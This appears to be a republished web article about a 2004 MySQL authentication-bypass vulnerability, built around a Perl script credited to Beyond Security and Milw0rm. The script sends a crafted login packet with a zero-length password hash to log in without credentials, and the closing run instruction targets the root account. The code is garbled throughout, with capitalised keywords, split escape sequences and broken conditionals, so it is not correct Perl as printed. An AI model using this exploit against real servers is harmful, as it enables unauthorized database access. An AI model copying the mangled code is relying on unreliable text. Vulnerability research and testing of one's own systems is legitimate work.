Use a zero-length password to bypass MySQL Authentication

An old article on www.2cto.com has not been posted yet

The user uses a specially crafted authentication data packet
The password authentication of the database may be bypassed.
 
Note: To use this script, MySQL listeners must allow
IP address connection.
The following is a test script to detect vulnerabilities
#! /Usr/bin/perl
#
# The script connects to MySQL and attempts to log in using a zero-length password
# Based on the vuln found by NGSSecurity
#
# The following Perl script can be used to test your version of MySQL. It will display
# The login packet sent to the server and it's reply.
#
# Exploit copyright (c) 2004 by Eli Kara, Beyond Security
# Elik beyondsecurity com
#
Use strict;
Use IO: Socket: INET;
Usage () unless (@ ARGV> = 1) | (@ ARGV <= 3 ));
My $ username = shift (@ ARGV );
My $ host = shift (@ ARGV );
If (! $ Host)
{
Usage ();
}
My $ port = shift (@ ARGV );
If (! $ Port)
{
$ Port = 3306; print "Using default MySQL port (3306) \ n ";
}
# Create the socket
My $ socket = IO: Socket: INET-> new (proto => 'tcp ', PeerAddr => $ host, PeerPort => $ port );
$ Socket or die "Cannot connect to host! \ N ";
# Receive greeting
My $ reply;
Recv ($ socket, $ reply, 1024, 0 );
If (length ($ reply) <7)
{
Print "Not allowed to connect to MySQL! \ N ";
Exit (1 );
}
Print "Received greeting: \ n ";
HexDump ($ reply );
Print "\ n ";
# Here we define the login OK reply
# My $ login_ OK = "\ x01 \ x00 \ x00 \ x02 \ xFE ";
# Break the username string into chars and rebuild it
My $ binuser = pack ("C *", unpack ("C *", $ username ));
# Send login caps packet with password
My $ packet = "\ x85 \ xa6 ".
"\ X03 \ x00 \ x00 ".
"\ X00 ".
"\ X00 \ x01 \ x08 \ x00 \ x00 \ x00". # capabilities, max packet, etc ..
"\ X00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 ".
"\ X00 \ x00 \ x00 \ x00". $ binuser. "\ x00 \ x14 \ x00 \ x00 \ x00 \ x00". # username and pword hash length + NULL hash
"\ X00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00"; # continue NULL hash
Substr ($ packet, 0, 0) = pack ("C1", length ($ packet )). "\ x00 \ x00 \ x01"; # MySQL message length + packet number (1)
Print "Sending caps packet: \ n ";
HexDump ($ packet );
Print "\ n ";
Send $ socket, $ packet, 0;
# Receive reply
Recv ($ socket, $ reply, 1024, 0 );
Print "replicated ed reply: \ n ";
HexDump ($ reply );
My @ list_bytes = unpack ("C *", $ reply );
# Print "The th byte is:", $ list_bytes [4], "\ n ";
If (length (@ list_bytes)> = 4)
{
Print "Response insufficent \ n ";
}
# If ($ reply eq $ login_ OK)
If ($ list_bytes [4] = 0 | $ list_bytes [4] = 254)
{
Print "Received OK reply, authentication successful !! \ N ";
}
Else
{
Print "Authentication failed! \ N ";
}
# Close
Close ($ socket );
 
Sub usage
{
# Print usage information
Print "\ nUsage: mysql_auth_bypass_zeropass.pl <username> <Username>-The DB username to authenticate
<Host>-The host to connect
[Port]-The TCP port which MySQL is listening on (optional, default is 3306) \ n ";
Exit (1 );
}
 
###
# Do a hexdump of a string (assuming it's binary)
###
Sub HexDump
{
My $ buffer =$ _ [0];
# Unpack it into chars
My @ up = unpack ("C *", $ buffer );
My $ pos = 0;
# Calculate matrix sizes
My $ rows = int (@ up/16 );
My $ leftover = int (@ up % 16 );
For (my $ row = 0; $ row <$ rows; $ row ++, $ pos + = 16)
{
Printf ("% 08X \ t", $ pos );
My @ values = @ up [$ pos... $ pos + 15];
My @ line;
Foreach my $ val (@ values)
{
Push (@ line, sprintf ("% 02X", $ val ));
}
Print join ('', @ line)," \ n ";
}
# Print last line
Printf ("% 08X \ t", $ pos );
My @ values = @ up [$ pos... $ pos + $ leftover-1];
My @ line;
Foreach my $ val (@ values)
{
Push (@ line, sprintf ("% 02X", $ val ));
}
Print join ('', @ line)," \ n ";
}
# Milw0rm.com [2004-07-10]
 
Because perl is used for invocation, the system must first install the perl compiler, and the path of the first line of the script must exist.
Run:
For more information, see "test", and then "chmod + x test ".
# Test root hostname.